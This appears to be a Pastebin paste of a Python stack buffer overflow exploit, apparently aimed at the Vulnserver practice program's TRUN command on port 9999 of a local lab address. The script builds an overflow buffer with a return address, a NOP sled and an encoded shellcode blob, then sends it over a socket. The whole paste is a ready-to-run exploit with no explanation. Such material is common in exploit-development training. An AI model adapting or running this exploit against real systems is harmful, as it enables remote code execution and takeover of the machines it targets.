SHARE
TWEET

Untitled

a guest Apr 23rd, 2019 95 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import socket
  2.  
  3. shellcode = ("\xdd\xc4\xb8\xeb\xfc\xf6\xbc\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
  4. "\x52\x31\x47\x17\x83\xc7\x04\x03\xac\xef\x14\x49\xce\xf8\x5b"
  5. "\xb2\x2e\xf9\x3b\x3a\xcb\xc8\x7b\x58\x98\x7b\x4c\x2a\xcc\x77"
  6. "\x27\x7e\xe4\x0c\x45\x57\x0b\xa4\xe0\x81\x22\x35\x58\xf1\x25"
  7. "\xb5\xa3\x26\x85\x84\x6b\x3b\xc4\xc1\x96\xb6\x94\x9a\xdd\x65"
  8. "\x08\xae\xa8\xb5\xa3\xfc\x3d\xbe\x50\xb4\x3c\xef\xc7\xce\x66"
  9. "\x2f\xe6\x03\x13\x66\xf0\x40\x1e\x30\x8b\xb3\xd4\xc3\x5d\x8a"
  10. "\x15\x6f\xa0\x22\xe4\x71\xe5\x85\x17\x04\x1f\xf6\xaa\x1f\xe4"
  11. "\x84\x70\x95\xfe\x2f\xf2\x0d\xda\xce\xd7\xc8\xa9\xdd\x9c\x9f"
  12. "\xf5\xc1\x23\x73\x8e\xfe\xa8\x72\x40\x77\xea\x50\x44\xd3\xa8"
  13. "\xf9\xdd\xb9\x1f\x05\x3d\x62\xff\xa3\x36\x8f\x14\xde\x15\xd8"
  14. "\xd9\xd3\xa5\x18\x76\x63\xd6\x2a\xd9\xdf\x70\x07\x92\xf9\x87"
  15. "\x68\x89\xbe\x17\x97\x32\xbf\x3e\x5c\x66\xef\x28\x75\x07\x64"
  16. "\xa8\x7a\xd2\x2b\xf8\xd4\x8d\x8b\xa8\x94\x7d\x64\xa2\x1a\xa1"
  17. "\x94\xcd\xf0\xca\x3f\x34\x93\x34\x17\x34\x62\xdd\x6a\x38\x7b"
  18. "\x8d\xe2\xde\xe9\xbd\xa2\x49\x86\x24\xef\x01\x37\xa8\x25\x6c"
  19. "\x77\x22\xca\x91\x36\xc3\xa7\x81\xaf\x23\xf2\xfb\x66\x3b\x28"
  20. "\x93\xe5\xae\xb7\x63\x63\xd3\x6f\x34\x24\x25\x66\xd0\xd8\x1c"
  21. "\xd0\xc6\x20\xf8\x1b\x42\xff\x39\xa5\x4b\x72\x05\x81\x5b\x4a"
  22. "\x86\x8d\x0f\x02\xd1\x5b\xf9\xe4\x8b\x2d\x53\xbf\x60\xe4\x33"
  23. "\x46\x4b\x37\x45\x47\x86\xc1\xa9\xf6\x7f\x94\xd6\x37\xe8\x10"
  24. "\xaf\x25\x88\xdf\x7a\xee\xa8\x3d\xae\x1b\x41\x98\x3b\xa6\x0c"
  25. "\x1b\x96\xe5\x28\x98\x12\x96\xce\x80\x57\x93\x8b\x06\x84\xe9"
  26. "\x84\xe2\xaa\x5e\xa4\x26")
  27.  
  28. #625011bb
  29. buffer = "A" * 2006 + "\xbb\x11\x50\x62" + "\x90" * 50 + shellcode + "\x90" * (2700 - 4 - 2006 - len(shellcode) - 50)
  30.  
  31. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  32. connection = sock.connect(("192.168.2.3", 9999))
  33.  
  34. sock.recv(1024)
  35.  
  36. sock.send("TRUN ." + buffer)
  37.  
  38. sock.close()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top